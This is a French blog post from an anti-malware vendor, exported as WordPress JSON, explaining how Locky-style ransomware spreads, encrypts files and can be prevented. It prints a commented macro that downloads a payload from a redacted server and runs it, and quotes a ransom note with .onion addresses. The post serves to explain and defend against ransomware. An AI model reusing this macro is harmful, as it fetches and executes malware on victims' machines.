{"id":428,"date":"2016-06-13T07:34:28","date_gmt":"2016-06-13T07:34:28","guid":{"rendered":"http:\/\/www.adlice.com\/fr\/?p=428"},"modified":"2022-12-21T10:36:56","modified_gmt":"2022-12-21T10:36:56","slug":"ransomware-propagation-prevention","status":"publish","type":"post","link":"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/","title":{"rendered":"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement ?"},"content":{"rendered":"<div class=\"wp-block-ub-table-of-contents-block ub_table-of-contents\" id=\"ub_table-of-contents-11ac1492-2640-4a45-b494-68484ed9eb62\" data-linktodivider=\"false\" data-showtext=\"show\" data-hidetext=\"hide\" data-scrolltype=\"auto\" data-enablesmoothscroll=\"false\" data-initiallyhideonmobile=\"false\" data-initiallyshow=\"true\"><div class=\"ub_table-of-contents-header-container\" style=\"\">\n\t\t\t<div class=\"ub_table-of-contents-header\" style=\"text-align: left; \">\n\t\t\t\t<div class=\"ub_table-of-contents-title\"><\/div>\n\t\t\t\t\n\t\t\t<\/div>\n\t\t<\/div><div class=\"ub_table-of-contents-extra-container\" style=\"\">\n\t\t\t<div class=\"ub_table-of-contents-container ub_table-of-contents-1-column \">\n\t\t\t\t<ul style=\"\"><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#0-quest-ce-quun-ransomware-ou-ran%C3%A7ongiciel-\" style=\"\">Qu&#8217;est ce qu&#8217;un Ransomware (ou Ran\u00e7ongiciel) ?<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#1-histoire-de-ransomware\" style=\"\">Histoire de Ransomware<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#2-m%C3%A9thode-de-propagation\" style=\"\">M\u00e9thode de propagation<\/a><ul><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#3-macros-\" style=\"\">Macros<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#4-exploits-\" style=\"\">Exploits<\/a><\/li><\/ul><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#5-chiffrement-et-demande-de-ran%C3%A7on\" style=\"\">Chiffrement et demande de ran\u00e7on<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#6-d%C3%A9sinfection-r%C3%A9cup%C3%A9ration-des-fichiers-chiffr%C3%A9s\" style=\"\">D\u00e9sinfection \/ r\u00e9cup\u00e9ration des fichiers chiffr\u00e9s<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#7-pr%C3%A9vention\" style=\"\">Pr\u00e9vention<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#8-conclusion\" style=\"\">Conclusion<\/a><\/li><li style=\"\"><a href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#9-faq\" style=\"\">FAQ<\/a><\/li><\/ul>\n\t\t\t<\/div>\n\t\t<\/div><\/div>\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"0-quest-ce-quun-ransomware-ou-ran%C3%A7ongiciel-\"><br>Qu&#8217;est ce qu&#8217;un Ransomware (ou Ran\u00e7ongiciel) ?<\/h4>\n\n\n\n<p>Un ransomware (ran\u00e7ongiciel) est un programme qui emp\u00eache l\u2019utilisateur d\u2019avoir acc\u00e8s \u00e0 ses fichiers et demande en \u00e9change une ran\u00e7on. Les ransomware \u00ab classiques \u00bb se lancent habituellement avec le syst\u00e8me et emp\u00eachent l\u2019utilisateur d\u2019acc\u00e9der \u00e0 son bureau. <strong>Si celui-ci ne paye pas<\/strong> dans un certain laps de temps, <strong>les fichiers sont effac\u00e9s<\/strong>. Un crypto ransomware ou cryptoware chiffre les fichiers de l\u2019utilisateur et demande \u00e0 l\u2019utilisateur de payer pour obtenir un programme qui permettra \u00e0 celui-ci de proc\u00e9der au d\u00e9chiffrement des fichiers.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"1-histoire-de-ransomware\"><br>Histoire de Ransomware<\/h4>\n\n\n\n<p>Les ransomware, \u00e0 savoir les logiciels demandeurs de ran\u00e7on existent depuis fort longtemps (<a href=\"https:\/\/en.wikipedia.org\/wiki\/AIDS_(Trojan_horse)\">AIDS Trojan, 1989<\/a>) mais n\u2019ont eu que fort peu d\u2019impact. Leurs moyens de propagation \u00e9taient peu sophistiqu\u00e9s et leur routine de chiffrement peu efficace. <strong>Toutefois, l\u2019ann\u00e9e 2013 marque leur retour<\/strong> avec l\u2019arriv\u00e9e sur le march\u00e9 du malware CryptoLocker. Celui-ci se distinguait de ses pr\u00e9d\u00e9cesseurs par l\u2019utilisation d\u2019une routine de chiffrement robuste et utilisait le botnet <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Zeus_(cheval_de_Troie)\">Zeus<\/a> pour se propager. Dans le reste de cet article, nous nous int\u00e9resserons aux sp\u00e9cifiquement aux crypto-ransomware actuels, plus pr\u00e9cis\u00e9ment \u00e0 Locky.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"2-m%C3%A9thode-de-propagation\"><br>M\u00e9thode de propagation<\/h4>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"3-macros-\"><br><strong>Macros<\/strong><\/h5>\n\n\n\n<p>La plupart du temps, l\u2019infection se pr\u00e9sente sous la forme d\u2019une pi\u00e8ce jointe attach\u00e9e \u00e0 un email. Il s\u2019agit la plupart du temps d\u2019un <strong>document Word ou Excel<\/strong> (respectivement .doc et .xls).<\/p>\n\n\n\n<figure class=\"wp-block-image alignnone\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png\"><img decoding=\"async\" width=\"846\" height=\"598\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png\" alt=\"A spam mail containing an infected Word file. Source : pulsetheworld.com\" class=\"wp-image-426\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus.png 846w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/locky-files-virus-300x212.png 300w\" sizes=\"(max-width: 846px) 100vw, 846px\" \/><\/a><figcaption class=\"wp-element-caption\">Un email de Spam contenant une pi\u00e8ce jointe Word infect\u00e9e. Source : pulsetheworld.com<\/figcaption><\/figure>\n\n\n\n<p><strong>Ces documents contiennent une macro<\/strong>, qui sera ex\u00e9cut\u00e9e d\u00e8s l&#8217;ouverture du document. Ci-dessous un exemple comment\u00e9 :<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>' Location of the payload (hacked WordPress setup). Multiple URls can be present\nurl = \"http:\/\/&#91;redacted]\/wp-includes\/certificates\/xh3uc\"\n\n' Name of the file to be created.\nfileName = \"temp.pif\"\n\n' Obtaining local computer %temp% path using the Environment collection (Shell object)\npathName = CreateObject(\"WScript.Shell\").ExpandEnvironmentStrings(\"%temp%\")\npathName = pathName &amp; '\\'\n\n' Creation of a XMLHttpRequest object (XML request using HTTP) used to download the payload\ndim webRequest: Set webRequest = createobject(\"Microsoft.XMLHTTP\")\n\n' Creation of a Stream Object (ADO) used to manipulate the stream\ndim stream: Set stream = createobject(\"Adodb.Stream\")\n\n' Synchronous connexion established with remote server using GET HTTP method \nwebRequest.Open \"GET\", url, False\n\n' HTTP request to the server\nwebRequest.Send\nwith stream\n    .type = 1 ' Binary data\n    .open ' Creation and opening of a new Stream object\n    .write webRequest.responseBody ' Write the response body (in this case, the payload) in the new object\n    .savetofile pathName &amp;  fileName, 2 ' Save the binary contents of the stream to a file\n\t\t\t\t\t\t\t\t\t\t' Overwrites the file if it already exists\nend with\n\n' Creation of a new Application object and execution of the payload using its contexts.\nSet payload = CreateObject(\"Shell.Application\")\npayload.Open pathName &amp; fileName<\/code><\/pre>\n\n\n\n<p><strong>Cette macro est ex\u00e9cut\u00e9e lors de l\u2019ouverture du document<\/strong>. Elle t\u00e9l\u00e9charge le crypto-ransomware en tant que tel (charge utile) sur un serveur op\u00e9r\u00e9 par l\u2019attaquant puis l\u2019ex\u00e9cute. Dans certains cas, le ransomware fera une copie du document sur les r\u00e9pertoires partag\u00e9s de l\u2019ordinateur.<\/p>\n\n\n\n<h5 class=\"wp-block-heading\" id=\"4-exploits-\"><br><strong>Exploits<\/strong><\/h5>\n\n\n\n<p>Les exploits kits utilisent des vuln\u00e9rabilit\u00e9s pr\u00e9sentes dans les navigateurs pour le forcer \u00e0 t\u00e9l\u00e9charger et ex\u00e9cuter le crypto-ransomware. <strong>Aucune action de l\u2019utilisateur n\u2019est requise<\/strong>.<br>Il peut \u00e9galement utiliser l\u2019<a href=\"https:\/\/fr.wikipedia.org\/wiki\/Ingenierie_sociale_(securite_de_l%27information)\">ing\u00e9nierie sociale<\/a> pour \u00ab tricker \u00bb l\u2019utilisateur \u00e0 installer l\u2019infection en se pr\u00e9sentant, par exemple, comme un outil l\u00e9gitime.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"5-chiffrement-et-demande-de-ran%C3%A7on\"><br>Chiffrement et demande de ran\u00e7on<\/h4>\n\n\n\n<p>Une fois le crypto-ransomware ex\u00e9cut\u00e9, celui-ci va contacter le serveur de l\u2019attaquant de mani\u00e8re \u00e0 g\u00e9rer une paire de cl\u00e9s cryptographiques unique. L\u2019une d&#8217;elles, la cl\u00e9 publique servira \u00e0 chiffrer les documents personnels de l\u2019utilisateur et sera <strong>d\u00e9pos\u00e9e sur l\u2019ordinateur de la victime<\/strong>. L\u2019autre, la cl\u00e9 priv\u00e9e sera <strong>entrepos\u00e9e sur le serveur de l\u2019attaquant<\/strong> et permettra de d\u00e9chiffrer les fichiers. Il s\u2019agit de <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Cryptographie_asym%C3%A9trique\">chiffrement asym\u00e9trique<\/a>. <strong>Les fichiers chiffr\u00e9s sont ainsi rendus compl\u00e8tement illisibles.<\/strong><\/p>\n\n\n\n<p>Une fois cette \u00e9tape termin\u00e9e, le malware efface les points de restauration syst\u00e8me ainsi que le contenu du <a href=\"https:\/\/fr.wikipedia.org\/wiki\/Shadow_Copy\">Shadow Copy<\/a> qui pourraient contenir une copie des fichiers. Puis, il cr\u00e9\u00e9 un fichier indiquant \u00e0 l\u2019utilisateur que ses fichiers ont \u00e9t\u00e9 chiffr\u00e9s et contenant un lien vers un conteneur <a href=\"https:\/\/www.adlice.com\/fr\/malware-crypto-mineur\/\" target=\"_blank\" rel=\"noreferrer noopener\">bitcoin<\/a> o\u00f9 la ran\u00e7on doit \u00eatre vers\u00e9e (habituellement entre 0.5 et 1.5 bitcoins).<\/p>\n\n\n\n<pre class=\"wp-block-code\"><code>@@@@@@@ NOT YOUR LANGUAGE? USE https:\/\/translate.google.com\n\n@@@@@@@ What happened to your files ?\n@@@@@@@ All of your files were protected by a strong encryption with RZA4096\n@@@@@@@ More information about the en-Xryption keys using RZA4096 can be found here: http:\/\/en.wikipedia.org\/wiki\/RSA_(cryptosystem)\n\n@@@@@@@ How did this happen ?\n@@@@@@@ !!! Specially for your PC was generated personal RZA4096 Key , both publik and private.\n@@@@@@@ !!! ALL YOUR FILES were en-Xrypted with the publik key, which has been transferred to your computer via the Internet.\n@@@@@@@ !!! Decrypting of your files is only possible with the help of the privatt key and de-crypt program , which is on our Secret Server\n\n@@@@@@@ What do I do ?\n@@@@@@@ So , there are two ways you can choose: wait for a miracle and get your price doubled, or start obtaining BITCOIN NOW! , and restore your data easy way\n@@@@@@@ If You have really valuable data, you better not waste your time, because there is no other way to get your files, except make a payment\n\n\nYour personal ID: &#91;Redacted]\n\nFor more specific instructions, please visit your personal home page, there are a few different addresses pointing to your page below:\n\n1 - http:\/\/gvxtkcbjnslm5vnt.onion.to\n2 - http:\/\/gvxtkcbjnslm5vnt.onion.cab\n3 - http:\/\/gvxtkcbjnslm5vnt.onion.city\n\nIf for some reasons the addresses are not available, follow these steps:\n\n1 - Download and install tor-browser: http:\/\/www.torproject.org\/projects\/torbrowser.html.en\n2 - After a successful installation, run the browser\n3 - Type in the address bar - http:\/\/gvxtkcbjnslm5vnt.onion\n4 - Follow the instructions on the site\n\nBe sure to copy your personal ID and the instruction link to your notepad not to lose them.<\/code><\/pre>\n\n\n\n<p><br>Le bitcoin a grandement favoris\u00e9 les ransomware car les auteurs peuvent beaucoup plus facilement rester anonymes. En effet, aucune pi\u00e8ce d\u2019identit\u00e9 n\u2019est n\u00e9cessaire pour ouvrir un compte. <strong>Ici, une capture d\u2019\u00e9cran du site gvxtkcbjnslm5vnt.onion<\/strong>, accessible uniquement via le <a rel=\"noreferrer noopener\" href=\"https:\/\/www.adlice.com\/fr\/darknet-explique\/\" target=\"_blank\">r\u00e9seau Tor<\/a>.<\/p>\n\n\n\n<figure class=\"wp-block-image\"><a href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\"><img decoding=\"async\" width=\"754\" height=\"444\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\" alt=\"2016-06-08_132612\" class=\"wp-image-425\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png 754w, https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612-300x177.png 300w\" sizes=\"(max-width: 754px) 100vw, 754px\" \/><\/a><\/figure>\n\n\n\n<p>Si l\u2019utilisateur paye, il re\u00e7oit habituellement un programme contenant la cl\u00e9 priv\u00e9e qui lui permet de d\u00e9chiffrer les fichiers. En revanche, s\u2019il attend trop longtemps, <strong>la cl\u00e9 priv\u00e9e est supprim\u00e9e du serveur, rendant tout d\u00e9chiffrement impossible<\/strong>.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"6-d%C3%A9sinfection-r%C3%A9cup%C3%A9ration-des-fichiers-chiffr%C3%A9s\"><br>D\u00e9sinfection \/ r\u00e9cup\u00e9ration des fichiers chiffr\u00e9s<\/h4>\n\n\n\n<p><strong>Il n\u2019existe pas de solution universelle. <\/strong><br>Il est ainsi conseill\u00e9 de soumettre l\u2019un d\u2019entre eux \u00e0 <a href=\"https:\/\/id-ransomware.malwarehunterteam.com\/\">ID Ransomware<\/a> qui d\u00e9terminera de quelle variante du malware il s\u2019agit et proposera, s\u2019il existe, un outil pour tenter de d\u00e9chiffrer les fichiers.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"7-pr%C3%A9vention\"><br>Pr\u00e9vention<\/h4>\n\n\n\n<p>Les antivirus classiques ne sont pas r\u00e9ellement efficaces contre ce genre de menaces. En effet, il arrive souvent que lorsque l\u2019infection est d\u00e9tect\u00e9e, la plupart voir la totalit\u00e9 des donn\u00e9es soit d\u00e9j\u00e0 chiffr\u00e9e. Il existe cependant des outils d\u00e9di\u00e9s \u00e0 cet usage. On peut notamment citer Malwares anti-ransomware et Bitdefender anti-ransomware. <\/p>\n\n\n\n<p>Ceux-ci utilisent une approche comportementale pour rep\u00e9rer les crypto-ransomware. Plus sp\u00e9cifiquement, ils observent les processus en cours d\u2019ex\u00e9cution et <strong>si l\u2019un d\u2019eux modifie les ent\u00eates de plusieurs fichiers, il est stopp\u00e9<\/strong>. Cependant, il ne faut pas perdre de vue qu\u2019ils ne sont pas infaillibles et que des <strong>variantes sp\u00e9cialement con\u00e7ues pour les contrer<\/strong> ne vont certainement pas tarder \u00e0 voir le jour.<\/p>\n\n\n\n<p>Une autre approche, plus contraignante mais plus efficace, <strong>est de d\u00e9finir des emplacement prot\u00e9g\u00e9s dans le syst\u00e8me de fichiers o\u00f9 les processsus suspicieux ne peuvent pas \u00e9crire<\/strong>, qui se retrouvent ainsi prot\u00e9g\u00e9es contre n&#8217;importe quel ransomware. Cette fonctionnalit\u00e9 a \u00e9t\u00e9 ajout\u00e9e dans <a href=\"https:\/\/www.adlice.com\/roguekiller\/\" target=\"_blank\" rel=\"noreferrer noopener\">RogueKiller V14<\/a>, sous la forme du module de protection <a href=\"https:\/\/www.adlice.com\/fr\/docs\/roguekiller\/commencer\/parametres\/#doclock\">DocLock<\/a>.<\/p>\n\n\n<div class=\"wp-block-image\">\n<figure class=\"aligncenter size-large\"><a class=\"dt-pswp-item\" href=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/01\/DocLock_Alert.png\"><img decoding=\"async\" width=\"1024\" height=\"425\" src=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-1024x425.png\" alt=\"\" class=\"wp-image-3565\" srcset=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-1024x425.png 1024w, https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2-300x125.png 300w, https:\/\/www.adlice.com\/wp-content\/uploads\/2019\/10\/rk14_detection2.png 1778w\" sizes=\"(max-width: 1024px) 100vw, 1024px\" \/><\/a><\/figure>\n<\/div>\n\n\n<p>Une bonne pratique consiste \u00e9galement \u00e0 <strong>maintenir ses logiciels \u00e0 jour<\/strong> pour se pr\u00e9munir des infections utilisant des exploits et de <strong>ne pas autoriser l\u2019ex\u00e9cution des macros automatiquement<\/strong>. Conserver une copie de ses documents personnels est \u00e9galement <strong>fortement recommand\u00e9<\/strong>.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"8-conclusion\"><br>Conclusion<\/h4>\n\n\n\n<p>Les ransomware sont appel\u00e9s \u00e0 se d\u00e9velopper encore davantage dans le futur. En effet, ceux-ci sont <strong>fort rentables et relativement simples \u00e0 d\u00e9velopper<\/strong>. Les solutions logicielles (c.f. section ci-dessus) existent mais ne sont de loin pas une panac\u00e9e. La meilleure solution reste donc de <strong>sauvegarder r\u00e9guli\u00e8rement ses donn\u00e9es sur un support externe<\/strong> de mani\u00e8re \u00e0 avoir une copie de celles-ci en tout temps. Cette copie pourrait \u00e9galement servir en cas de crash du disque dur, ce qui peut arriver en tout temps et o\u00f9 il y a de fortes probabilit\u00e9s que les donn\u00e9es soient totalement <strong>irr\u00e9cup\u00e9rables<\/strong>.<\/p>\n\n\n\n<h4 class=\"has-accent-color has-text-color wp-block-heading\" id=\"9-faq\"><br>FAQ<\/h4>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Dois-je payer ?<\/strong><br>Il est recommand\u00e9 de ne pas c\u00e9der au chantage. En effet, cela ne fait qu\u2019encourager les auteurs et il arrive parfois que m\u00eame apr\u00e8s avoir pay\u00e9, les fichiers ne puissent pas \u00eatre d\u00e9chiffr\u00e9s. Cependant, si ces donn\u00e9es vous sont vraiment pr\u00e9cieuses et que toutes tentatives de r\u00e9cup\u00e9ration ont \u00e9chou\u00e9, c\u2019est une solution.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Je ne compte pas payer. Puis-je supprimer ces fichiers chiffr\u00e9s ?<\/strong><br>Il est conseill\u00e9 de conserver les donn\u00e9es chiffr\u00e9es car un outil de d\u00e9chiffrement pourrait voir le jour dans un avenir plus ou moins lointain.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Pourquoi ne pas d\u00e9velopper un outil de d\u00e9chiffrement pour chaque variante existante ?<\/strong><br>Le d\u00e9veloppement des outils de d\u00e9chiffrement rendu disponible par les \u00e9diteurs antivirus est rendu possible par la d\u00e9couverte de failles dans certains m\u00e9canismes de chiffrement ou encore par l\u2019obtention des cl\u00e9s priv\u00e9es apr\u00e8s la saisie d\u2019un serveur.<br>Ceci ne concerne cependant que peu de crypto-ransomware.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>J\u2019ai du temps et un ordinateur puissant. Ne puis-je pas essayer de trouver la cl\u00e9 de d\u00e9chiffrement par attaque par force brute ?<\/strong><br>Les crypto-ransomwares r\u00e9cents utilisent habituellement des cl\u00e9s 2048-bit RSA ou sup\u00e9rieures. Les experts s\u2019accordent \u00e0 dire que celles-ci sont impossible \u00e0 cracker.<\/li>\n<\/ul>\n\n\n\n<ul class=\"wp-block-list\">\n<li><strong>Pourquoi ne pas saisir les serveurs \/ les comptes bitcoins utilis\u00e9s par les attaquants ?<\/strong><br>La justice s\u2019emploie \u00e0 cela mais c\u2019est un processus long et compliqu\u00e9. De m\u00eame, ceux-ci utilisent souvent des machines pirat\u00e9es. Toutefois, l\u2019<a href=\"https:\/\/en.wikipedia.org\/wiki\/Operation_Tovar\">Op\u00e9ration Tovar<\/a> a montr\u00e9 que c\u2019\u00e9tait possible en mettant un terme \u00e0 l\u2019infection CryptoLocker et en r\u00e9cup\u00e9rant la base de donn\u00e9es contenant les cl\u00e9s priv\u00e9es.<\/li>\n<\/ul>\n","protected":false},"excerpt":{"rendered":"<p>Les ransomware sont devenus la menace du web. Apprenez leur fonctionnement, leurs effets, et apprenez \u00e0 vous en pr\u00e9munir.<\/p>\n","protected":false},"author":1,"featured_media":425,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[54],"tags":[20,126,135,370,377,23,8,136,138],"class_list":["post-428","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-analyse","tag-analyse","tag-cryptolocker","tag-cryptolocker-fr","tag-locky","tag-locky-fr","tag-malware-fr","tag-malware","tag-rancon","tag-rancongiciel","category-54","description-off"],"views":883,"yoast_score":61,"yoast_readable":90,"featured_image_src":"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png","author_info":{"display_name":"tigzy","author_link":"https:\/\/www.adlice.com\/fr\/author\/tigzy\/"},"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.1.1 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Ransomware : Comment s&#039;en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software<\/title>\n<meta name=\"description\" content=\"Les Ransomware connaissent un pic d&#039;activit\u00e9, et touchent particuliers et entreprises. Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.\" \/>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\" \/>\n<meta property=\"og:locale\" content=\"fr_FR\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Ransomware : Comment s&#039;en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software\" \/>\n<meta property=\"og:description\" content=\"Les Ransomware connaissent un pic d&#039;activit\u00e9, et touchent particuliers et entreprises. Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.\" \/>\n<meta property=\"og:url\" content=\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\" \/>\n<meta property=\"og:site_name\" content=\"Adlice Software\" \/>\n<meta property=\"article:publisher\" content=\"https:\/\/www.facebook.com\/RogueKiller\" \/>\n<meta property=\"article:published_time\" content=\"2016-06-13T07:34:28+00:00\" \/>\n<meta property=\"article:modified_time\" content=\"2022-12-21T10:36:56+00:00\" \/>\n<meta property=\"og:image\" content=\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\" \/>\n\t<meta property=\"og:image:width\" content=\"754\" \/>\n\t<meta property=\"og:image:height\" content=\"444\" \/>\n\t<meta property=\"og:image:type\" content=\"image\/png\" \/>\n<meta name=\"author\" content=\"tigzy\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:creator\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:site\" content=\"@AdliceSoftware\" \/>\n<meta name=\"twitter:label1\" content=\"\u00c9crit par\" \/>\n\t<meta name=\"twitter:data1\" content=\"tigzy\" \/>\n\t<meta name=\"twitter:label2\" content=\"Dur\u00e9e de lecture estim\u00e9e\" \/>\n\t<meta name=\"twitter:data2\" content=\"8 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\/\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#article\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\"},\"author\":{\"name\":\"tigzy\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/person\/a02b30804320a4059d268dc2567a307d\"},\"headline\":\"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement ?\",\"datePublished\":\"2016-06-13T07:34:28+00:00\",\"dateModified\":\"2022-12-21T10:36:56+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\"},\"wordCount\":1343,\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/#organization\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"keywords\":[\"analyse\",\"cryptolocker\",\"cryptolocker\",\"locky\",\"locky\",\"malware\",\"malware\",\"ran\u00e7on\",\"ran\u00e7ongiciel\"],\"articleSection\":[\"Analyse\"],\"inLanguage\":\"fr-FR\"},{\"@type\":\"WebPage\",\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\",\"url\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\",\"name\":\"Ransomware : Comment s'en prot\u00e9ger ? | D\u00e9finition \u2022 Adlice Software\",\"isPartOf\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/#website\"},\"primaryImageOfPage\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage\"},\"image\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage\"},\"thumbnailUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"datePublished\":\"2016-06-13T07:34:28+00:00\",\"dateModified\":\"2022-12-21T10:36:56+00:00\",\"description\":\"Les Ransomware connaissent un pic d'activit\u00e9, et touchent particuliers et entreprises. Apprenez \u00e0 vous en prot\u00e9ger \u00e0 travers cette analyse.\",\"breadcrumb\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#breadcrumb\"},\"inLanguage\":\"fr-FR\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/\"]}]},{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#primaryimage\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2016\/06\/2016-06-08_132612.png\",\"width\":754,\"height\":444},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\/\/www.adlice.com\/fr\/ransomware-propagation-prevention\/#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\/\/www.adlice.com\/fr\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Ransomware : Comment s&#8217;en prot\u00e9ger efficacement ?\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#website\",\"url\":\"https:\/\/www.adlice.com\/fr\/\",\"name\":\"Adlice Software\",\"description\":\"Anti-malware and analysis tools\",\"publisher\":{\"@id\":\"https:\/\/www.adlice.com\/fr\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\/\/www.adlice.com\/fr\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"fr-FR\"},{\"@type\":\"Organization\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#organization\",\"name\":\"Adlice Software\",\"url\":\"https:\/\/www.adlice.com\/fr\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"fr-FR\",\"@id\":\"https:\/\/www.adlice.com\/fr\/#\/schema\/logo\/image\/\",\"url\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"contentUrl\":\"https:\/\/www.adlice.com\/wp-content\/uploads\/2020\/05\/B1rTNpTG_400x40_10.png\",\"width\":276,\"height\":276,\"caption\":\"Adlice 